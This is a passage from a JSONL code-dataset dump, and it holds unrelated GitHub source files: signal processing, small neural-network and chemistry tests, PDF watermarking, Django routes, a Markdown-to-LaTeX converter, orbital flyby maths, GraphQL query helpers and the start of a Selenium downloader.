e\n\telse:\n\t\ts.add(summe)\n\nprint(count)","repo_name":"janskrz/comp_coding","sub_path":"codeforces/round_674/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15931823901","text":"\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.util import dispatch\nfrom tensorflow.python.util.tf_export import tf_export\n@tf_export(\"signal.overlap_and_add\")\n@dispatch.add_dispatch_support\ndef overlap_and_add(signal, frame_step, name=None):\n \"\"\"Reconstructs a signal from a framed representation.\n Adds potentially overlapping frames of a signal with shape\n `[..., frames, frame_length]`, offsetting subsequent frames by `frame_step`.\n The resulting tensor has shape `[..., output_size]` where\n output_size = (frames - 1) * frame_step + frame_length\n Args:\n signal: A [..., frames, frame_length] `Tensor`. All dimensions may be\n unknown, and rank must be at least 2.\n frame_step: An integer or scalar `Tensor` denoting overlap offsets. 
Must be\n less than or equal to `frame_length`.\n name: An optional name for the operation.\n Returns:\n A `Tensor` with shape `[..., output_size]` containing the overlap-added\n frames of `signal`'s inner-most two dimensions.\n Raises:\n ValueError: If `signal`'s rank is less than 2, or `frame_step` is not a\n scalar integer.\n \"\"\"\n with ops.name_scope(name, \"overlap_and_add\", [signal, frame_step]):\n signal = ops.convert_to_tensor(signal, name=\"signal\")\n signal.shape.with_rank_at_least(2)\n frame_step = ops.convert_to_tensor(frame_step, name=\"frame_step\")\n frame_step.shape.assert_has_rank(0)\n if not frame_step.dtype.is_integer:\n raise ValueError(\"frame_step must be an integer. Got %s\" %\n frame_step.dtype)\n frame_step_static = tensor_util.constant_value(frame_step)\n frame_step_is_static = frame_step_static is not None\n frame_step = frame_step_static if frame_step_is_static else frame_step\n signal_shape = array_ops.shape(signal)\n signal_shape_static = tensor_util.constant_value(signal_shape)\n if signal_shape_static is not None:\n signal_shape = signal_shape_static\n outer_dimensions = signal_shape[:-2]\n outer_rank = array_ops.size(outer_dimensions)\n outer_rank_static = tensor_util.constant_value(outer_rank)\n if outer_rank_static is not None:\n outer_rank = outer_rank_static\n def full_shape(inner_shape):\n return array_ops.concat([outer_dimensions, inner_shape], 0)\n frame_length = signal_shape[-1]\n frames = signal_shape[-2]\n output_length = frame_length + frame_step * (frames - 1)\n if (frame_step_is_static and signal.shape.dims is not None and\n frame_step == signal.shape.dims[-1].value):\n output_shape = full_shape([output_length])\n return array_ops.reshape(signal, output_shape, name=\"fast_path\")\n segments = -(-frame_length // frame_step)\n paddings = [[0, segments], [0, segments * frame_step - frame_length]]\n outer_paddings = array_ops.zeros([outer_rank, 2], dtypes.int32)\n paddings = array_ops.concat([outer_paddings, paddings], 0)\n signal = array_ops.pad(signal, paddings)\n shape = full_shape([frames + segments, segments, frame_step])\n signal = array_ops.reshape(signal, shape)\n perm = array_ops.concat(\n [math_ops.range(outer_rank), outer_rank + [1, 0, 2]], 0)\n perm_static = tensor_util.constant_value(perm)\n perm = perm_static if perm_static is not None else perm\n signal = array_ops.transpose(signal, perm)\n shape = full_shape([(frames + segments) * segments, frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = signal[..., :(frames + segments - 1) * segments, :]\n shape = full_shape([segments, (frames + segments - 1), frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = math_ops.reduce_sum(signal, -3)\n shape = full_shape([(frames + segments - 1) * frame_step])\n signal = array_ops.reshape(signal, shape)\n signal = signal[..., :output_length]\n return signal\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_0/reconstruction_ops.py.transformed.py","file_name":"reconstruction_ops.py.transformed.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"19057622903","text":"#!/usr/bin/env python\n# https://www.analyticsvidhya.com/blog/2016/04/neural-networks-python-theano/\nimport theano\nimport theano.tensor as T\nimport numpy as np\nfrom random import random\nimport matplotlib.pyplot as plt\n\n\n# input\nx = T.matrix('x')\nw = theano.shared(np.array([random(), random()]))\nb = theano.shared(1.)\nlearning_rate = 
0.01\na_hat = T.vector() # actual output\n\n# output\nz = T.dot(x, w) + b\na = 1 / (1 + T.exp(-z)) # activation function: sigmoid\ncost = -(a_hat*T.log(a) + (1 - a_hat)*T.log(1-a)).sum()\n\n# training function: gradient descent\ndw, db = T.grad(cost, [w, b])\ntrain = theano.function(\n inputs = [x, a_hat],\n outputs = [a, cost],\n updates = [\n (w, w - learning_rate*dw),\n (b, b - learning_rate*db)\n ]\n)\n\n######################################################\n\n# inputs and outputs\ninputs = [\n (0, 0),\n (0, 1),\n (1, 0),\n (1, 1)\n]\noutputs = [\n 0,\n 0,\n 0,\n 1\n]\n\n# loop over (inputs, outputs) & update (weights, bias)\ncost = []\nfor iteration in range(30000):\n pred, cost_iter = train(inputs, outputs)\n cost.append(cost_iter)\n\n# print the outputs\nfor i in range(len(inputs)):\n print('%d AND %d = %f' % (inputs[i][0], inputs[i][1], pred[i]))\n\n# plot the cost\nplt.plot(cost)\nplt.show()\n\n","repo_name":"h4k1m0u/theano-scripts","sub_path":"and.py","file_name":"and.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2701508307","text":"#!/usr/bin/env python\n\nimport unittest\nfrom functools import reduce\nimport numpy\nfrom pyscf import gto\nfrom pyscf import scf\nfrom pyscf import ao2mo\nfrom pyscf import fci\nfrom pyscf.fci import fci_slow\n\nnelec = (3,4)\nnorb = 8\nh1e = numpy.random.random((norb,norb))\nh2e = numpy.random.random((norb,norb,norb,norb))\nh2e = h2e + h2e.transpose(2,3,0,1)\nna = fci.cistring.num_strings(norb, nelec[0])\nnb = fci.cistring.num_strings(norb, nelec[1])\nci0 = numpy.random.random((na,nb))\n\nclass KnowValues(unittest.TestCase):\n def test_contract(self):\n ci1ref = fci_slow.contract_1e(h1e, ci0, norb, nelec)\n ci1 = fci.direct_nosym.contract_1e(h1e, ci0, norb, nelec)\n self.assertTrue(numpy.allclose(ci1ref, ci1))\n\n ci1ref = fci_slow.contract_2e(h2e, ci0, norb, nelec)\n ci1 = fci.direct_nosym.contract_2e(h2e, ci0, norb, nelec)\n self.assertTrue(numpy.allclose(ci1ref, ci1))\n\n\nif __name__ == \"__main__\":\n print(\"Full Tests for spin1\")\n unittest.main()\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"fci/test/test_direct_nosym.py","file_name":"test_direct_nosym.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40996660166","text":"import numpy as np\nimport random \nimport nltk.tokenize as tk\nfrom keras.preprocessing.sequence import pad_sequences\nimport keras.utils as ku\nimport time\nimport csv\nwith open('data\\\\vocab.txt','r',encoding='utf-8') as f:\n\tid2w=[line.strip() for line in f.readlines()]\n\tw2id={v:k for k,v in enumerate(id2w)}\n\ncontext=3\nmax_len=30\ndata=[]\nnow = time.time()\nwith open('data\\\\data_to_id_train.csv','r',encoding='utf-8') as f:\n\treader=csv.reader(f)\n\tfor line in reader:\n\t\tsentence=np.array(line,dtype=int)\n\t\ttemp_list=list()\n\t\tfor i in range(0,len(sentence)):\n\t\t\ttemp_list.append(sentence[:i+1])\n\t\ttemp_list=pad_sequences(temp_list,maxlen=max_len,padding=\"pre\")\n\t\tfor i in temp_list:\n\t\t\tdata.append(i)\nprint(\"data length:\"+str(len(data)))\nnow2=time.time()\nprint(\"get data cost:\"+str(now2-now))\ndef generator(batch_size, data=data):\n\tcount=0\n\tdata_length=len(data)\n\twhile True:\n\t\tif(count+batch_size>=data_length):\n\t\t\tcount=0\n\t\ttmp=data[count:count+batch_size]\n\t\tcount+=batch_size\n\t\tprint(count)\n\t\tresult=np.array(tmp)\n\t\tpredictors, label = 
result[:,:-1],result[:,-1]\n\t\tlabel = ku.to_categorical(label, num_classes=len(w2id))\n\t\tyield predictors,label","repo_name":"ChenTao98/lstm-language-model","sub_path":"dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9796025533","text":"import PyPDF3\n\nif __name__ == \"__main__\":\n pdf_file = open(\"/home/felix/Downloads/abc.pdf\", \"rb\")\n pdf_reader = PyPDF3.PdfFileReader(pdf_file)\n pdf_reader.decrypt(\"123\")\n\n watermark_pdf_file = open(\"/home/felix/Downloads/wartermark.pdf\", \"rb\")\n watermark_pdf_reader = PyPDF3.PdfFileReader(watermark_pdf_file)\n\n firstPage = pdf_reader.getPage(0)\n watermark_page = watermark_pdf_reader.getPage(0)\n watermark_page.rotateClockwise(180)\n firstPage.mergePage(watermark_pdf_reader.getPage(0))\n\n pdf_writer = PyPDF3.PdfFileWriter()\n pdf_writer.encrypt(\"abc\") # encryption PDF file\n pdf_writer.addPage(firstPage)\n\n for page_num in range(1, pdf_reader.getNumPages()):\n page_obj = pdf_reader.getPage(page_num)\n pdf_writer.addPage(page_obj)\n\n output_pdf_file = open(\"/home/felix/Downloads/abc_cover.pdf\", \"wb\")\n pdf_writer.write(output_pdf_file)\n\n pdf_file.close()\n watermark_pdf_file.close()\n output_pdf_file.close()\n","repo_name":"tinylambda/keep","sub_path":"books/atbswp/ch13/ch13_1_6.py","file_name":"ch13_1_6.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"934081294","text":"\"\"\"domotica URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom domotica.core import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('iluminacao/', views.lighting, name='lighting'),\n path('videovigilancia/', views.surveillance, name='surveillance'),\n path('cam01/', views.cam01, name='cam01'),\n path('cliente/', views.clientConnect, name='clientConnect')\n]\n","repo_name":"adbrum/domotica","sub_path":"domotica/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29537123060","text":"#!/usr/bin/python3\n# encoding=utf-8\n\nimport sys\nimport mistune\n\n# see http://0x01.me/Python字符编码的一个坑/\nimport codecs\nsys.stdout = codecs.getwriter('utf8')(sys.stdout.detach())\nsys.stdin = codecs.getreader('utf8')(sys.stdin.detach())\n\n\nclass LaTeXRenderer(mistune.Renderer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.replace = True\n\n def block_code(self, code, lang=None):\n code = code.rstrip('\\n')\n if lang and code:\n code = self.escape(code)\n return '\\\\begin{lstlisting}[language=%s]\\n%s\\n\\\\end{lstlisting}\\n\\n' % (lang, code)\n if lang:\n lang, _, filename = lang[:-1].partition('[')\n return '\\\\lstinputlisting[language=%s, caption={%s}]{%s}\\n\\n' % (lang, self.escape(filename), filename)\n code = self.escape(code)\n return '\\\\begin{lstlisting}\\n%s\\n\\\\end{lstlisting}\\n\\n' % code\n\n def block_quote(self, text):\n return '\\\\begin{quote}%s\\n\\\\end{quote}\\n\\n' % text.rstrip('\\n')\n\n def header(self, text, level, raw=None):\n levels = ['',\n 'section',\n 'subsection',\n 'subsubsection',\n 'paragraph',\n 'subparagraph',\n 'subparagraph']\n return '\\\\%s{%s}\\n\\n' % (levels[level], text)\n\n def hrule(self):\n return '\\\\hrule\\n\\n'\n\n def list(self, body, ordered=True):\n cmd = 'enumerate' if ordered else 'itemize'\n return '\\\\begin{%s}\\n%s\\\\end{%s}\\n\\n' % (cmd, body, cmd)\n\n def list_item(self, text):\n return '\\\\item %s\\n' % text\n\n def paragraph(self, text):\n return '%s\\n\\n' % text.strip(' ')\n\n def table(self, header, body):\n raise NotImplementedError\n\n def table_row(self, content):\n raise NotImplementedError\n\n def table_cell(self, content, **flags):\n raise NotImplementedError\n\n def double_emphasis(self, text):\n return '\\\\textbf{\\\\emph{%s}}' % text\n\n def emphasis(self, text):\n return '\\\\emph{%s}' % text\n\n def codespan(self, text):\n return '\\\\texttt{%s} ' % self.escape(text.rstrip())\n\n def linebreak(self):\n return '\\\\\\n'\n\n def strikethrough(self, text):\n raise NotImplementedError\n\n def text(self, text):\n return self.escape(text)\n\n def escape(self, text):\n if not text:\n return ''\n newtext = ''\n for c in text:\n if c == '$':\n newtext += c\n self.replace = not self.replace\n continue\n if self.replace:\n # c = c.replace('\\\\', '\\\\textbackslash')\n # c = c.replace('{', '\\\\{')\n # c = c.replace('}', '\\\\}')\n # c = c.replace('\\\\textbackslash', '\\\\textbackslash{}')\n c = c.replace('~', '\\\\textasciitilde{}')\n c = c.replace('#', '\\\\#')\n # c = c.replace('$', '\\\\$')\n c = c.replace('%', '\\\\%')\n c = c.replace('^', '\\\\textasciicircum{}')\n c = c.replace('&', '\\\\&')\n c = c.replace('_', '\\\\_')\n newtext += c\n return newtext\n\n def autolink(self, link, is_email=False):\n return self.escape(link)\n\n def link(self, link, title, text):\n return '\\\\href{%s}{%s}' % 
(self.escape(link), self.escape(text))\n\n def image(self, src, title, text):\n if text:\n return '\\\\ref{%s}%%\\n' \\\n '\\\\begin{figure}[htbp]\\n' \\\n ' \\\\centering\\n' \\\n ' \\\\includegraphics[width=0.8\\\\linewidth]{%s}\\n' \\\n ' \\\\caption{%s}\\n' \\\n ' \\\\label{%s}\\n' \\\n '\\\\end{figure}%%\\n' \\\n % (text, src, self.escape(title), text)\n return '\\\\begin{figure}[H]\\n' \\\n ' \\\\centering\\n' \\\n ' \\\\includegraphics[width=0.8\\\\linewidth]{%s}\\n' \\\n ' \\\\caption{%s}\\n' \\\n '\\\\end{figure}\\n\\n' \\\n % (src, self.escape(title))\n\n def footnote_ref(self, key, index):\n raise NotImplementedError\n\n def footnote_item(self, key, text):\n raise NotImplementedError\n\n def footnotes(self, text):\n return text\n\n\ndef main():\n text = sys.stdin.read()\n front_matter, _, text = text.partition('\\n---\\n')\n args = {}\n for l in front_matter.split('\\n'):\n if ':' in l:\n key, _, value = l.partition(': ')\n args[key] = value\n title = args['title']\n author = args['author']\n renderer = LaTeXRenderer()\n parser = mistune.Markdown(renderer=renderer)\n print(r'''\\documentclass[12pt,a4paper]{article}\n\n\\usepackage{ctex}\n\\usepackage[paper=a4paper,includefoot,margin=54pt]{geometry}\n\\usepackage[colorlinks,linkcolor=black,anchorcolor=black,citecolor=black,unicode]{hyperref}\n\\usepackage{float}\n\\usepackage{listings}\n\\lstset{frame=single,breaklines=true,postbreak=\\raisebox{0ex}[0ex][0ex]{\\ensuremath{\\hookrightarrow\\space}}}\n\n\\renewcommand{\\lstlistingname}{程序}\n\\renewcommand{\\contentsname}{目录}\n\\renewcommand{\\abstractname}{摘要}\n\\renewcommand{\\refname}{参考文献}\n\\renewcommand{\\indexname}{索引}\n\\renewcommand{\\figurename}{图}\n\\renewcommand{\\tablename}{表}\n\\renewcommand{\\appendixname}{附录}\n\n\\begin{document}\n\n\\title{%s}\n\\author{%s}\n\n\\maketitle\n\\tableofcontents\n\\newpage\n''' % (title, author))\n print(parser(text))\n print('\\\\end{document}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"SmartHypercube/Markdown2LaTeX","sub_path":"md2LaTeX.py","file_name":"md2LaTeX.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"5966299344","text":"# https://programmers.co.kr/learn/courses/30/lessons/42586\r\n\r\n# math.ceil 은 내림, math.floor는 올림, math.round는 반올림\r\n\r\nimport math\r\n\r\ndef solution(progresses, speeds):\r\n answer = []\r\n left = []\r\n total = len(progresses)\r\n\r\n for i in range(total):\r\n left.append(math.ceil((100-progresses[i])/speeds[i]))\r\n\r\n num = 1\r\n last = left[0]\r\n if total >= 1:\r\n if total == 1:\r\n answer.append(num)\r\n return answer\r\n for i in range(1, total):\r\n if i == total - 1:\r\n if last < left[i]:\r\n answer.append(num)\r\n num = 1\r\n else:\r\n num += 1\r\n answer.append(num)\r\n elif last < left[i]:\r\n answer.append(num)\r\n last = left[i]\r\n num = 1\r\n else:\r\n num += 1\r\n \r\n return answer","repo_name":"kylew1004/algorithm","sub_path":"Programmers/코딩테스트 고득점 kit/스택_큐/기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7721863282","text":"from astropy import units as u\n\nfrom poliastro.core.flybys import compute_flyby as compute_flyby_fast\n\n\n@u.quantity_input(\n v_spacecraft=u.km / u.s,\n v_body=u.km / u.s,\n k=u.km**3 / u.s**2,\n r_p=u.km,\n theta=u.deg,\n)\ndef compute_flyby(v_spacecraft, v_body, k, r_p, theta=0 * u.deg):\n \"\"\"Computes 
outbound velocity after a flyby.\n\n Parameters\n ----------\n v_spacecraft : ~astropy.units.Quantity\n Velocity of the spacecraft, relative to the attractor of the body.\n v_body : ~astropy.units.Quantity\n Velocity of the body, relative to its attractor.\n k : ~astropy.units.Quantity\n Standard gravitational parameter of the body.\n r_p : ~astropy.units.Quantity\n Radius of periapsis, measured from the center of the body.\n theta : ~astropy.units.Quantity, optional\n Aim angle of the B vector, default to 0.\n\n Returns\n -------\n v_spacecraft_out : ~astropy.units.Quantity\n Outbound velocity of the spacecraft.\n delta : ~astropy.units.Quantity\n Turn angle.\n\n \"\"\"\n v_spacecraft = v_spacecraft.to_value(u.km / u.s)\n v_body = v_body.to_value(u.km / u.s)\n k = k.to_value(u.km**3 / u.s**2)\n r_p = r_p.to_value(u.km)\n theta = theta.to_value(u.rad)\n\n v_spacecraft_out, delta = compute_flyby_fast(\n v_spacecraft, v_body, k, r_p, theta\n )\n\n return v_spacecraft_out * u.km / u.s, delta * u.rad\n","repo_name":"poliastro/poliastro","sub_path":"src/poliastro/threebody/flybys.py","file_name":"flybys.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":806,"dataset":"github-code","pt":"21"} +{"seq_id":"32850175577","text":"import numpy as np\n\n\ndef correction(p, n=1e6):\n \"\"\"LaPlace correction\n \"\"\"\n return (p*n+1) / (n*p.shape[1])\n\n\ndef odds(p):\n p = correction(p)\n return p / (1-p)\n\n\ndef WE(preds, conds):\n \"\"\"Weighted evidence\n measured in bits\n \"\"\"\n return np.log2(odds(preds)) - np.log2(odds(conds))\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n from featuresharing import dataio\n from tqdm import tqdm\n import os\n\n parser = ArgumentParser()\n parser.add_argument('--datadir', type=str, required=True, help='Path to data. Automatically looks for files:\\n'\n 'data-predictions.npz, data-targets.npz')\n parser.add_argument('--layers', type=str, required=True, nargs='+',\n help='Layers to process. 
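A toy run of the weighted-evidence helpers defined above, with made-up probability rows; `correction` and `odds` are copied from the file so the snippet is self-contained:

```python
# Weighted evidence in bits for one unit, on invented (1 x 3) probability rows.
import numpy as np

def correction(p, n=1e6):
    """LaPlace correction, as defined in the file above."""
    return (p * n + 1) / (n * p.shape[1])

def odds(p):
    p = correction(p)
    return p / (1 - p)

preds = np.array([[0.7, 0.2, 0.1]])    # marginal predictions
conds = np.array([[0.9, 0.05, 0.05]])  # conditionals given a unit's state
we = np.log2(odds(preds)) - np.log2(odds(conds))
print(we.round(3))
```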
Automatically looks for files that match:\\n'\n 'data-conditionals_layer=[layer].npz')\n parser.add_argument('--method', type=str, required=True,\n help='Legal values: we, probdiff, infdiff')\n\n args = parser.parse_args()\n\n # ------------------------------------------------------------------------------------------------------------------\n # Evaluate arguments\n\n methods = {\n 'we': WE,\n 'probdiff': lambda px, py: px-py,\n 'infdiff': lambda px, py: np.log2(px) - np.log2(py),\n }\n\n if args.method.lower() not in methods:\n parser.error('Illegal method %s' % args.method)\n\n method = methods[args.method.lower()]\n\n # ------------------------------------------------------------------------------------------------------------------\n # Load data\n\n predictions, _ = dataio.loadnpz(os.path.join(args.datadir, 'data-predictions.npz'))\n\n # ------------------------------------------------------------------------------------------------------------------\n # Read and evaluate conditionals\n\n for layer in tqdm(args.layers):\n conditionals, keys = dataio.loadnpz(os.path.join(args.datadir, 'data-conditionals_layer=%s.npz' % layer))\n\n evidence = {}\n for i, key in enumerate(keys):\n evidence[key] = np.zeros(conditionals[i].shape)\n\n for unitidx in range(conditionals[i].shape[0]):\n evidence[key][unitidx, :] = method(predictions[i], conditionals[i][unitidx])\n\n np.savez(os.path.join(args.datadir, 'data-featurecontribution_layer=%s.npz' % layer), **evidence)\n\n print('Done')\n","repo_name":"mlosch/FeatureSharing","sub_path":"featuresharing/analysis/featurecontribution.py","file_name":"featurecontribution.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"33775317596","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nperegrine.resources.submission.graphql.util\n----------------------------------------\n\nDefines utility functions for GraphQL implementation.\n\"\"\"\n\nfrom flask import current_app as capp\nfrom flask import g as fg\nfrom . 
import node\nfrom datamodelutils import models\n\nfrom graphql.utils.ast_to_dict import ast_to_dict\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import load_only\n\nimport psqlgraph\n\n# from peregrine.resources.submission.constants import (\n# FILTER_ACTIVE,\n# )\n\nDEFAULT_LIMIT = 10\n\n\ndef set_session_timeout(session, timeout):\n session.execute(\n \"SET LOCAL statement_timeout = {}\".format(int(float(timeout) * 1000))\n )\n\n\ndef get_column_names(entity):\n \"\"\"Returns an iterable of column names the entity has\"\"\"\n if hasattr(entity, \"__pg_properties__\"):\n return (k for k in entity.__pg_properties__)\n\n return (c.name for c in entity.__table__.columns)\n\n\ndef column_dict(row, skip=set()):\n \"\"\"Returns a dict with all columns except those in :param:`skip`\"\"\"\n\n return {\n column: getattr(row, column)\n for column in get_column_names(row)\n if column not in skip\n }\n\n\ndef filtered_column_dict(row, info, fields_depend_on_columns=None):\n \"\"\"Returns a dict with only columns required for query\"\"\"\n\n columns = get_loaded_columns(row, info, fields_depend_on_columns)\n\n return {column: getattr(row, column) for column in columns}\n\n\ndef get_active_project_ids():\n return [\n \"{}-{}\".format(project.programs[0].name, project.code)\n for project in capp.db.nodes(Project)\n .filter(models.Project._props[\"state\"].astext != \"closed\")\n .filter(models.Project._props[\"state\"].astext != \"legacy\")\n .all()\n ]\n\n\ndef active_project_filter(q):\n \"\"\"Takes a query and applies a filter to select only nodes that have a\n ``project_id`` relating to an active project.\n\n :param q: a SQLAlchemy ``Query`` object\n :returns: the filtered ``Query`` object\n\n ..note::\n\n For security reasons, if the selected query entity is a\n :class:`psqlgraph.Node` object, apply the filter on project\n id. This removes things that do not have a ``project_id`` from\n the results. TODO: make allow result types that do not have\n ``project_id`` while maintaining filter correctness.\n\n\n \"\"\"\n\n cls = q.entity()\n\n if cls.label == \"project\":\n return q.filter(models.Project._props[\"state\"].astext != \"closed\").filter(\n models.Project._props[\"state\"].astext != \"legacy\"\n )\n\n fg.active_project_ids = fg.get(\"active_project_ids\") or get_active_project_ids()\n if cls == psqlgraph.Node or hasattr(cls, \"project_id\"):\n project_id_attr = cls._props[\"project_id\"].astext\n q = q.filter(project_id_attr.in_(fg.active_project_ids))\n\n return q\n\n\ndef authorization_filter(q):\n \"\"\"Takes a query and applies a filter to select only nodes that the\n current request user has access to based on ``project_id``.\n\n :param q: a SQLAlchemy ``Query`` object\n :returns: the filtered ``Query`` object\n\n ..note::\n\n For security reasons, if the selected query entity is a\n :class:`psqlgraph.Node` object, apply the filter on project\n id. This removes things that do not have a ``project_id`` from\n the results. 
TODO: make allow result types that do not have\n ``project_id`` while maintaining filter correctness.\n\n \"\"\"\n\n cls = q.entity()\n\n if cls == psqlgraph.Node or hasattr(cls, \"project_id\"):\n q = q.filter(cls._props[\"project_id\"].astext.in_(fg.read_access_projects))\n\n if cls.label == \"project\":\n # do not return unauthorized projects\n q = node.filter_project_project_id(q, fg.read_access_projects, None)\n\n # if FILTER_ACTIVE:\n # q = active_project_filter(q)\n\n return q\n\n\ndef get_authorized_query(cls):\n return authorization_filter(capp.db.nodes(cls))\n\n\ndef apply_arg_limit(q, args, info):\n limit = args.get(\"first\", DEFAULT_LIMIT)\n if limit > 0:\n q = q.limit(limit)\n return q\n\n\ndef apply_arg_offset(q, args, info):\n offset = args.get(\"offset\", 0)\n if offset > 0:\n q = q.offset(offset)\n return q\n\n\ndef get_loaded_columns(entity, info, fields_depend_on_columns=None):\n \"\"\"Returns a set of columns loaded from database\n because some fields depend on columns of a different name,\n :param:`depends_on` is there to map to the so we know to load them\n \"\"\"\n\n fields = set(get_fields(info))\n\n if fields_depend_on_columns:\n fields.update(\n {\n column\n for field in fields\n for column in fields_depend_on_columns.get(field, {})\n }\n )\n\n all_columns = set(get_column_names(entity))\n used_columns = fields.intersection(all_columns)\n\n return used_columns\n\n\ndef apply_load_only(query, info, fields_depend_on_columns=None):\n \"\"\"Returns optimized q by selecting only the necessary columns\"\"\"\n\n # if the entity doesn't have a backing table then don't do this\n # this happens when using the generic node property\n if not hasattr(query.entity(), \"__table__\"):\n return query\n\n columns = get_loaded_columns(query.entity(), info, fields_depend_on_columns)\n\n return query.options(load_only(*columns))\n\n\n# The below is lifted from\n# https://gist.github.com/mixxorz/dc36e180d1888629cf33\n\n\ndef collect_fields(node, fragments):\n \"\"\"Recursively collects fields from the AST\n Args:\n node (dict): A node in the AST\n fragments (dict): Fragment definitions\n Returns:\n A dict mapping each field found, along with their sub fields.\n {'name': {},\n 'sentimentsPerLanguage': {'id': {},\n 'name': {},\n 'totalSentiments': {}},\n 'slug': {}}\n \"\"\"\n\n field = {}\n\n if node.get(\"selection_set\"):\n for leaf in node[\"selection_set\"][\"selections\"]:\n if leaf[\"kind\"] == \"Field\":\n field.update({leaf[\"name\"][\"value\"]: collect_fields(leaf, fragments)})\n elif leaf[\"kind\"] == \"FragmentSpread\":\n field.update(\n collect_fields(fragments[leaf[\"name\"][\"value\"]], fragments)\n )\n\n return field\n\n\ndef get_fields(info):\n \"\"\"A convenience function to call collect_fields with info\n Args:\n info (ResolveInfo)\n Returns:\n dict: Returned from collect_fields\n \"\"\"\n\n fragments = {}\n node = ast_to_dict(info.field_asts[0])\n\n for name, value in info.fragments.items():\n fragments[name] = ast_to_dict(value)\n\n return collect_fields(node, fragments)\n\n\ndef clean_count(q):\n \"\"\"Returns the count from this query without pulling all the columns\n\n This gets the count from a query without doing a subquery\n The subquery would pull all the information from the DB\n and cause statement timeouts with large numbers of rows.\n\n Args:\n q (psqlgraph.query.GraphQuery): The current query object.\n\n \"\"\"\n query_count = (\n q.options(sa.orm.lazyload(\"*\"))\n .statement.with_only_columns([sa.func.count()])\n .order_by(None)\n )\n return 
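To make the docstring of `collect_fields` concrete, here is the same recursion run on a hand-built AST fragment (the field names are invented, and the `FragmentSpread` branch is omitted for brevity):

```python
# Hand-built fragment of the dict produced by ast_to_dict, plus the recursion.
node = {
    "selection_set": {"selections": [
        {"kind": "Field", "name": {"value": "id"}},
        {"kind": "Field", "name": {"value": "project"},
         "selection_set": {"selections": [
             {"kind": "Field", "name": {"value": "code"}},
         ]}},
    ]}
}

def collect_fields(node, fragments):
    field = {}
    if node.get("selection_set"):
        for leaf in node["selection_set"]["selections"]:
            if leaf["kind"] == "Field":
                field[leaf["name"]["value"]] = collect_fields(leaf, fragments)
    return field

print(collect_fields(node, {}))  # {'id': {}, 'project': {'code': {}}}
```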
q.session.execute(query_count).scalar()\n","repo_name":"uc-cdis/peregrine","sub_path":"peregrine/resources/submission/graphql/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"18239335493","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as selenium_webdriver_support_expectedConditions\nfrom selenium.common.exceptions import TimeoutException as selenium_common_exceptions_TimeoutException\nfrom selenium.common.exceptions import ElementNotInteractableException as selenium_common_exceptions_ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException as selenium_common_exceptions_ElementClickInterceptedException\nimport argparse, time, os, re, csv, urllib, datetime\n\nparser = argparse.ArgumentParser(argument_default=False, description='Download raw lab data.')\nparser.add_argument('--verbose', '-v', action='count', default=0, help='Turn on verbose mode.')\nparser.add_argument('--force-redownload', action='store_true', help='Downloads pages even if they already exist. Will not overwrite existing page.')\nparser.add_argument('--check-newest', type=int, action='store', nargs='?', const=10, help='Sorts by \"Desc\". Stops when first 10 existing samples are encountered.')\nparser.add_argument('-p', '--profile', default='../browser_profiles/firefox', help='Path to a valid Firefox profile if you wanna use a specially prepared profile.')\nparser.add_argument('--wait-after-newtab', default=0, type=int, help='Whether to wait after a new tab is opened and for how many seconds.')\nparser.add_argument('--newtab-url', default='about:blank', help='What page should be initially loaded when a new tab is opened.')\nparser.add_argument('-s', '--save-path', default='database_dump/', help='In which 